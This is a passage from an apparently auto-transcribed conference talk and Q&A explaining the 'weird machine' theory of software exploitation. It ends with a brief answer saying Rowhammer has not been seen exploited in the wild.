then you transform this into an even weirder state using this transformation and then you transform this into an even weirder state using the next transformation and the set of possible states blows up and becomes everything and the exploitation is programming the weird machine meaning you have the intended machine and then as soon as one state is corrupted you have a weird machine a machine that is still programmable by providing more input to it and that still mutates from one state to the other but the set of states is much larger than anybody imagined even and the goal of the attack is to drive the machine, this weird machine to a state where it's useful and a lot of people that have been writing exploits have this as a sort of meta-theorem and meta-understanding in their head and that's the model they use for writing exploits but nobody has written this down in a proper way and a lot of people have a more intuitive understanding of it and the leap of trying to formalize this intuitive understanding hasn't been properly done yet once again the same model is applied just to a software bug it's undefined state so what makes the exploit different? so the bug is the thing that causes the first state the exploit is programming along these transitions to reach a different state a state that violates security assumptions because the program has an intended state machine and that state machine has security assumptions like XYZ can never happen the attacker uses a state that shouldn't have been there in the first place and then carefully drives this weird machine to a state where the assumptions of the defender are violated or where the assumptions on security like the security properties of the system are violated does that make sense? or any other question? have you ever found any signs of Rohammer being exploited in the wild? so we haven't seen any signs of Rohammer being exploited in the wild seeing it would be fairly difficult and as an attacker you would need to be very desperate to use it because the sad reality is to quote a paraphrase an unnamed operating system vendor can we switch the camera off before I do so? sorry